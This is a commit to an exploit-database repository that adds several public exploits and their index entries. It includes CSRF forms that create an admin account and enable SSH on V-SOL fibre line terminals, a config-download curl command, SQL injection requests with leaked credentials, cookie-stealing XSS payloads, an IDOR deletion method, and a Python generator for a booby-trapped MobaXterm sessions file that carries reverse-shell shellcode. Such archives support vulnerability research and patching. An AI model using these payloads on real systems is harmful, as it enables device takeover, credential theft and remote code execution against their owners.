DB: 2019-09-28

10 changes to exploits/shellcodes Mobatek MobaXterm 12.1 - Buffer Overflow (SEH) thesystem App 1.0 - Persistent Cross-Site Scripting InoERP 0.7.2 - Persistent Cross-Site Scripting thesystem App 1.0 - 'server_name' SQL Injection thesystem App 1.0 - 'username' SQL Injection V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
2019-09-28 05:01:47 +00:00 · 2019-09-28 05:01:47 +00:00 · 4802945877
commit 4802945877
parent dc44a5e5a6
11 changed files with 558 additions and 4 deletions
--- a/exploits/hardware/webapps/47433.txt
+++ b/exploits/hardware/webapps/47433.txt
@ -0,0 +1,47 @@
 # Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download
 # Date: 2019-09-27
 # Author: LiquidWorm
 # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
 # Product web page: https://www.vsolcn.com
 # Affected version: V2.03.62R_IPv6
 # V2.03.54R
 # V2.03.52R
 # V2.03.49
 # V2.03.47
 # V2.03.40
 # V2.03.26
 # V2.03.24
 # V1.8.6
 # V1.4
 Summary: GPON is currently the leading FTTH standard in broadband access
 technology being widely deployed by service providers around the world.
 GPON/EPON OLT products are 1U height 19 inch rack mount products. The
 features of the OLT are small, convenient, flexible, easy to deploy, high
 performance. It is appropriate to be deployed in compact room environment.
 The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
 ICT applications.
 Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
 configuration download and information disclosure vulnerability when direct
 object reference is made to the usrcfg.conf file using an HTTP GET method. This
 will enable the attacker to disclose sensitive information and help her in
 authentication bypass, privilege escalation and/or full system access.
 Tested on: GoAhead-Webs
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2019-5534
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php
 25.09.2019
 --
 # PoC
 1# curl http://192.168.8.200/device/usrcfg.conf
 2# curl http://192.168.8.201/action/usrcfg.conf
--- a/exploits/hardware/webapps/47434.txt
+++ b/exploits/hardware/webapps/47434.txt
@ -0,0 +1,71 @@
 # Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery
 # Author: LiquidWorm 
 # Discovery Date: 2019-09-26 
 # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
 # Product web page: https://www.vsolcn.com
 # Tested on: GoAhead-Webs
 # Advisory ID: ZSL-2019-5536
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
 # Affected version: V2.03.62R_IPv6
 # V2.03.54R
 # V2.03.52R
 # V2.03.49
 # V2.03.47
 # V2.03.40
 # V2.03.26
 # V2.03.24
 # V1.8.6
 # V1.4
 Summary: GPON is currently the leading FTTH standard in broadband access
 technology being widely deployed by service providers around the world.
 GPON/EPON OLT products are 1U height 19 inch rack mount products. The
 features of the OLT are small, convenient, flexible, easy to deploy, high
 performance. It is appropriate to be deployed in compact room environment.
 The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
 ICT applications.
 Desc: The application interface allows users to perform certain actions via
 HTTP requests without performing any validity checks to verify the requests.
 This can be exploited to perform certain actions with administrative privileges
 if a logged-in user visits a malicious web site.
 CSRF add admin:
 ---------------
 <html>
  <body>
    <form action="http://192.168.8.200/action/user.html" method="POST">
      <input type="hidden" name="user_name_add" value="Spy" />
      <input type="hidden" name="user_password_add" value="pass123" />
      <input type="hidden" name="password_confirm_add" value="pass123" />
      <input type="hidden" name="user_role" value="1" />
      <input type="hidden" name="user_name_mod" value="" />
      <input type="hidden" name="user_password_mod" value="" />
      <input type="hidden" name="password_confirm_mod" value="" />
      <input type="hidden" name="user_role_mod" value="0" />
      <input type="hidden" name="option_um" value="100/" />
      <input type="hidden" name="who" value="0" />
      <input type="submit" value="Init" />
    </form>
  </body>
 </html>
 CSRF enable SSH:
 ----------------
 <html>
  <body>
    <form action="https://192.168.8.200/action/sshglobal.html" method="POST">
      <input type="hidden" name="ssh_enable" value="1" />
      <input type="hidden" name="ssh_version" value="2" />
      <input type="hidden" name="auth_retries" value="6" />
      <input type="hidden" name="ssh_timeout" value="120" />
      <input type="hidden" name="ssh_modulus" value="2048" />
      <input type="hidden" name="who" value="0" />
      <input type="submit" value="Init" />
    </form>
  </body>
 </html>
--- a/exploits/hardware/webapps/47435.txt
+++ b/exploits/hardware/webapps/47435.txt
@ -0,0 +1,80 @@
 # Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation
 # Author: LiquidWorm 
 # Discovery Date: 2019-09-26 
 # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
 # Product web page: https://www.vsolcn.com
 # Tested on: GoAhead-Webs
 # Advisory ID: ZSL-2019-5538
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
 # Affected version: V2.03.62R_IPv6
 # V2.03.54R
 # V2.03.52R
 # V2.03.49
 # V2.03.47
 # V2.03.40
 # V2.03.26
 # V2.03.24
 # V1.8.6
 # V1.4
 Summary: GPON is currently the leading FTTH standard in broadband access
 technology being widely deployed by service providers around the world.
 GPON/EPON OLT products are 1U height 19 inch rack mount products. The
 features of the OLT are small, convenient, flexible, easy to deploy, high
 performance. It is appropriate to be deployed in compact room environment.
 The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
 ICT applications.
 Desc: The application interface allows users to perform certain actions via
 HTTP requests without performing any validity checks to verify the requests.
 This can be exploited to perform certain actions with administrative privileges
 if a logged-in user visits a malicious web site.
 V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
 Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
 Product web page: https://www.vsolcn.com
 Affected version: V2.03.62R_IPv6
                  V2.03.54R
                  V2.03.52R
                  V2.03.49
                  V2.03.47
                  V2.03.40
                  V2.03.26
                  V2.03.24
                  V1.8.6
                  V1.4
 Summary: GPON is currently the leading FTTH standard in broadband access
 technology being widely deployed by service providers around the world.
 GPON/EPON OLT products are 1U height 19 inch rack mount products. The
 features of the OLT are small, convenient, flexible, easy to deploy, high
 performance. It is appropriate to be deployed in compact room environment.
 The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
 ICT applications.
 Desc: The application suffers from a privilege escalation vulnerability.
 Normal user can elevate his/her privileges by sending a HTTP POST request
 setting the parameter 'user_role_mod' to integer value '1' gaining admin
 rights.
 <html>
  <body>
    <form action="http://192.168.8.200/action/user.html" method="POST">
      <input type="hidden" name="user_name_add" value="" />
      <input type="hidden" name="user_password_add" value="" />
      <input type="hidden" name="password_confirm_add" value="" />
      <input type="hidden" name="user_role" value="0" />
      <input type="hidden" name="user_password_mod" value="test" />
      <input type="hidden" name="password_confirm_mod" value="test" />
      <input type="hidden" name="user_role_mod" value="1" />
      <input type="hidden" name="option_um" value="17" />
      <input type="hidden" name="who" value="1" />
      <input type="submit" value="Escalate" />
    </form>
  </body>
 </html>
--- a/exploits/php/webapps/47426.txt
+++ b/exploits/php/webapps/47426.txt
@ -5,10 +5,9 @@
 # Version: 4.15
 # CVE: N/A
-
+# A malicious query can be sent in base64 encoding to unserialize() function.
-# A malicious query can be sent in base64 encoding to unserialize() function. 
+# It can be deserialized without any sanitization then.
-# It can be deserialized as an array without any sanitization then. 
+# After it, it gets passed directly to the SQL query.
 # After it, each element of the array is passed directly to the SQL query. 
 #!/bin/python
--- a/exploits/php/webapps/47428.txt
+++ b/exploits/php/webapps/47428.txt
@ -0,0 +1,43 @@
 # Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting
 # Google Dork: None
 # Date: 2019-09-14
 # Exploit Author: strider
 # Vendor: http://inoideas.org/
 # Software Link: https://github.com/inoerp/inoERP
 # Version: 0.7.2
 # Tested on: Debian 10 Buster x64 / Kali Linux
 # CVE : None
 ====================================[Description]====================================
 There is a security flaw on the comment section, which allows to make persistant xss without any authentication.
 An attacker could use this flaw to gain cookies to get into a account of registered users.
 ====================================[Vulnerability]====================================
 extensions/comment/post_comment.php in the server part
 $$extension = new $extension;
 foreach ($field_array as $key => $value) {
 	if (!empty($_POST[$value])) {
 	 $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities
 	} else {
 	 $$extension->$value = "";
 	}
 }
 includes/functions/functions.inc in the server part
 function mysql_prep($value) {
 return $value; <-- just returns the value
 }
 ====================================[Proof of Concept]====================================
 Step 1:
 http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7
 Step 2:
 open a new question and submit it.
 Step 3:
 then paste this PoC-Code below into the comment field and submit that
 <img src=# onerror="alert(document.cookie);">
--- a/exploits/php/webapps/47430.txt
+++ b/exploits/php/webapps/47430.txt
@ -0,0 +1,45 @@
 # Exploit Title: thesystem 1.0 - 'server_name' SQL Injection 
 # Author: Sadik Cetin 
 # Discovery Date: 2019-09-26 
 # Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
 # Software Link: https://github.com/kostasmitroglou/thesystem 
 # Tested Version: 1.0 
 # Tested on OS: Windows 10 
 # CVE: N/A 
 # Description: 
 # Simple SQL injection after login bypass(login_required didn't used) 
 POST /data/ HTTP/1.1 
 Host: 127.0.0.1:8000 
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
 Accept-Encoding: gzip, deflate 
 Content-Type: multipart/form-data; boundary=---------------------------18467633426500 
 Content-Length: 330 
 Connection: close 
 Referer: http://127.0.0.1:8000/data/ 
 Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
 Upgrade-Insecure-Requests: 1 
 -----------------------------18467633426500 
 Content-Disposition: form-data; name="csrfmiddlewaretoken" 
 9LsPWlffpiAEGYeCvR9Bead9tslR18flkZRAjREhmqtJpFwNrnSBJXTH245O5sh3 
 -----------------------------18467633426500 
 Content-Disposition: form-data; name="server_name" 
 ' or '1=1 
 -----------------------------18467633426500-- 
 HTTP/1.1 200 OK 
 Date: Thu, 26 Sep 2019 12:16:11 GMT 
 Server: WSGIServer/0.2 CPython/3.5.3 
 Content-Type: text/html; charset=utf-8 
 X-Frame-Options: SAMEORIGIN 
 Content-Length: 190 
 (23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')
--- a/exploits/php/webapps/47431.txt
+++ b/exploits/php/webapps/47431.txt
@ -0,0 +1,60 @@
 # Exploit Title: thesystem App 1.0 - Persistent Cross-Site Scripting
 # Author: İsmail Güngör 
 # Discovery Date: 2019-09-26 
 # Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
 # Software Link: https://github.com/kostasmitroglou/thesystem 
 # Tested Version: 1.0 
 # Tested on OS: Windows 10 
 # CVE: N/A 
 # Description: 
 # Stored XSS after login bypass(login_required didn't used) 
 First of all following request is sent web server 
 POST /data/ HTTP/1.1 
 Host: 127.0.0.1:8000 
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
 Accept-Encoding: gzip, deflate 
 Content-Type: multipart/form-data; boundary=---------------------------191691572411478 
 Content-Length: 332 
 Connection: close 
 Referer: http://127.0.0.1:8000/data/ 
 Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
 Upgrade-Insecure-Requests: 1 
 -----------------------------191691572411478 
 Content-Disposition: form-data; name="csrfmiddlewaretoken" 
 0sryZfN7NDe4UUwhjehPQxPRtaMSq85nbGQjmLc9KL79DBOsfK0Plkvp2MwPus75 
 -----------------------------191691572411478 
 Content-Disposition: form-data; name="server_name" 
 <h1>test 
 -----------------------------191691572411478-- 
 After following request is sent web server 
 GET /show_search/ HTTP/1.1 
 Host: 127.0.0.1:8000 
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
 Accept-Encoding: gzip, deflate 
 Connection: close 
 Referer: http://127.0.0.1:8000/data/ 
 Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
 Upgrade-Insecure-Requests: 1 
 # Finally, response is shown Xtored XSS: 
 HTTP/1.1 200 OK 
 Date: Thu, 26 Sep 2019 12:25:19 GMT 
 Server: WSGIServer/0.2 CPython/3.5.3 
 Content-Type: text/html; charset=utf-8 
 X-Frame-Options: SAMEORIGIN 
 Content-Length: 176 
 ('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '<h1>test')('2019-09-26 15:23:50.367709', '<script>alert("kale")</script>')
--- a/exploits/php/webapps/47432.txt
+++ b/exploits/php/webapps/47432.txt
@ -0,0 +1,38 @@
 # Exploit Title: thesystem App 1.0 - 'username' SQL Injection
 # Author: Anıl Baran Yelken 
 # Discovery Date: 2019-09-26 
 # Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
 # Software Link: https://github.com/kostasmitroglou/thesystem 
 # Tested Version: 1.0 
 # Tested on OS: Windows 10 
 # CVE: N/A 
 # Description: 
 # Simple SQL injection after login bypass(login_required didn't used) 
 POST /check_users/ HTTP/1.1 
 Host: 127.0.0.1:8000 
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
 Accept-Encoding: gzip, deflate 
 Content-Type: multipart/form-data; boundary=---------------------------54363239114604 
 Content-Length: 327 
 Connection: close 
 Referer: http://127.0.0.1:8000/check_users/ 
 Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 
 Upgrade-Insecure-Requests: 1 
 -----------------------------54363239114604 
 Content-Disposition: form-data; name="csrfmiddlewaretoken" 
 lZVnIo12dzwRuJbCXjjr7cVAQKa4qwhBwdk85Uq4aHpWdqtNTP2rCZB8pmU1uQjj 
 -----------------------------54363239114604 
 Content-Disposition: form-data; name="username" 
 ' or '1=1 
 -----------------------------54363239114604-- 
 HTTP/1.1 200 OK 
 Date: Thu, 26 Sep 2019 12:40:24 GMT 
 Server: WSGIServer/0.2 CPython/3.5.3 
 Content-Type: text/html; charset=utf-8 
 X-Frame-Options: SAMEORIGIN 
 Content-Length: 34 
 User:('test', '1234', 'test@test')
--- a/exploits/php/webapps/47436.txt
+++ b/exploits/php/webapps/47436.txt
@ -0,0 +1,44 @@
 # Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
 # Google Dork: inurl:/wp-content/themes/zoner/
 # Date: 2019-09-24
 # Exploit Author: m0ze
 # Vendor Homepage: https://fruitfulcode.com/
 # Software Link: https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226
 # Version: 4.1.1
 # Tested on: Parrot OS
 ----[]- Persistent XSS: -[]----
 Create a new agent account, log in and press the blue «Plus» button under
 the main menu («Add Your Property» text will pop-up on hover) - you will be
 redirected to https://zoner.demo-website.com/?add-property=XXXX page. Use
 your payload inside «Address» input field («Local information» block),
 press on the «Create Property» button and check your payload on the
 https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
 page. Your new property must be approved by admin, so this is a good point
 to steal some cookies :)
 Payload Sample: "><img src=x onerror=alert('Greetings from m0ze')>
 PoC: log in as agentm0ze:WhgZbOUH (login/password) and go to the
 https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties
 page.
 ----[]- IDOR: -[]----
 Create a new agent account, log in and create a new property. Then go to
 the
 https://zoner.fruitfulcode.com/author/aaaagent/?profile-page=my_properties
 page and pay attention to the trash icon under your property info. Open the
 developers console and check out this code: <a title="Delete Property"
 href="#" data-toggle="modal" class="delete-property"
 data-propertyid="XXX"><i class="delete fa fa-trash-o"></i></a>. Edit the
 data-propertyid="XXX" attribute by typing instead of XXX desired post or
 page ID which you want to delete (you can get post/page ID on the <body>
 tag class -> postid-494, so attribute for post with ID 494 will be
 data-propertyid="494"). After you edit the ID, click on the trash icon and
 confirm deletion (POST
 https://zoner.fruitfulcode.com/wp-admin/admin-ajax.php?action=delete_property_act&property_id=494&security=1304db23f0).
 Funny fact that you can delete ANY post & page (!) you want, security key
 is not unique for each requests so it's possible to erase all pages and
 posts within a few minutes.
--- a/exploits/windows/remote/47429.py
+++ b/exploits/windows/remote/47429.py
@ -0,0 +1,118 @@
 # Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
 # Author: Xavi Beltran
 # Date: 2019-08-31
 # Vendor: xavibel.com
 # Vedor Page: https://mobaxterm.mobatek.net/download.html
 # Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
 # Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/
 # Description:
 # SEH based Buffer Overflow in the Username field of a valid session
 # This exploit generates a malicious MobaXterm sessions file
 # When the user double clicks in the session, the shellcode is going to be executed
 # You need to adapt the exploit to your current OS Windows version
 #!/usr/bin/env python
 # This is not the IP address of the reverse shell
 # To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
 ip_address = "192.168.1.88"
 port = "22"
 # We are going to recreate a MobaXterm sessions file export
 print ("[+] Creating the malicious MobaXterm file...")
 sessions_file  = ""
 sessions_file += "[Bookmarks]\n"
 sessions_file += "SubRep=\n"
 sessions_file += "ImgNum=42\n"
 sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"
 # Here is the SEH Based Buffer Overflow part
 # [*] Exact match at offset 16672
 # We have to substract 4 that corresponds to NSEH
 junk1 = "A" * 16668
 # Here we need to jump forward but EB is a bad char
 # We decrease ESP and use a conditional jump after
 # I have learned this trick in OSCE. Thank you Muts 
 nseh = ""
 nseh += "\x4C"     # DEC ESP
 nseh += "\x4C"     # DEC ESP
 nseh += "\x77\x21" # JA SHORT 1035FE59
 # Using a XP-SP1 so modules are compiled without SafeSEH
 # !mona seh -cp asciiprint
 # 0x762C5042 POP-POP-RET crypt32.dll
 seh  = "\x42\x50\x2C\x76"
 # Some padding that we are going to jump over it
 junk2 = "\x42" * 29
 # We recover the initial state of the stack
 alignment = ""
 alignment += "\x44" # INC ESP
 alignment += "\x44" # INC ESP
 # And we reach our shellcode
 # A0 is a badchar but the generated encoded shellcode won't use it
 # /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
 # /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
 # Shellcode 636 bytes
 shellcode = ""
 shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"
 shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
 shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"
 shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"
 shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"
 shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"
 shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"
 shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"
 shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"
 shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"
 shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"
 shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"
 shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"
 shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"
 shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"
 shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"
 shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"
 shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"
 shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"
 shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"
 shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"
 shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"
 shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"
 shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"
 shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"
 shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"
 shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"
 shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"
 shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"
 shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"
 shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"
 shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"
 shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"
 shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"
 shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"
 shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"
 shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"
 shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"
 shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"
 shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"
 crash = junk1 + nseh + seh + junk2 + alignment + shellcode
 # We need to mantain the MobaXterm sessions file structure
 sessions_file += crash
 sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"
 # We generate the file
 f = open( 'pwnd.mxtsessions', 'w' )
 f.write(sessions_file)
 f.close()
 print ("[+] pwnd.mxtsessions file created!")
 print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -17683,6 +17683,7 @@ id,file,description,date,author,type,platform,port
 47408,exploits/watchos/remote/47408.py,"HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure",2019-09-23,"Lazy Hacker",remote,watchos,
 47412,exploits/windows/remote/47412.py,"File Sharing Wizard 1.5.0 - POST SEH Overflow",2019-09-24,x00pwn,remote,windows,80
 47416,exploits/windows/remote/47416.rb,"Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free (Metasploit)",2019-09-24,Metasploit,remote,windows,3389
 47429,exploits/windows/remote/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41764,4 +41765,12 @@ id,file,description,date,author,type,platform,port
 47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
 47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
 47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php,
 47431,exploits/php/webapps/47431.txt,"thesystem App 1.0 - Persistent Cross-Site Scripting",2019-09-27,"İsmail Güngör",webapps,php,
 47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,
 47428,exploits/php/webapps/47428.txt,"InoERP 0.7.2 - Persistent Cross-Site Scripting",2019-09-27,strider,webapps,php,
 47430,exploits/php/webapps/47430.txt,"thesystem App 1.0 - 'server_name' SQL Injection",2019-09-27,"Sadik Cetin",webapps,php,
 47432,exploits/php/webapps/47432.txt,"thesystem App 1.0 - 'username' SQL Injection",2019-09-27,"Anıl Baran Yelken",webapps,php,
 47433,exploits/hardware/webapps/47433.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download",2019-09-27,LiquidWorm,webapps,hardware,
 47434,exploits/hardware/webapps/47434.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery",2019-09-27,LiquidWorm,webapps,hardware,
 47435,exploits/hardware/webapps/47435.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation",2019-09-27,LiquidWorm,webapps,hardware,
 47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,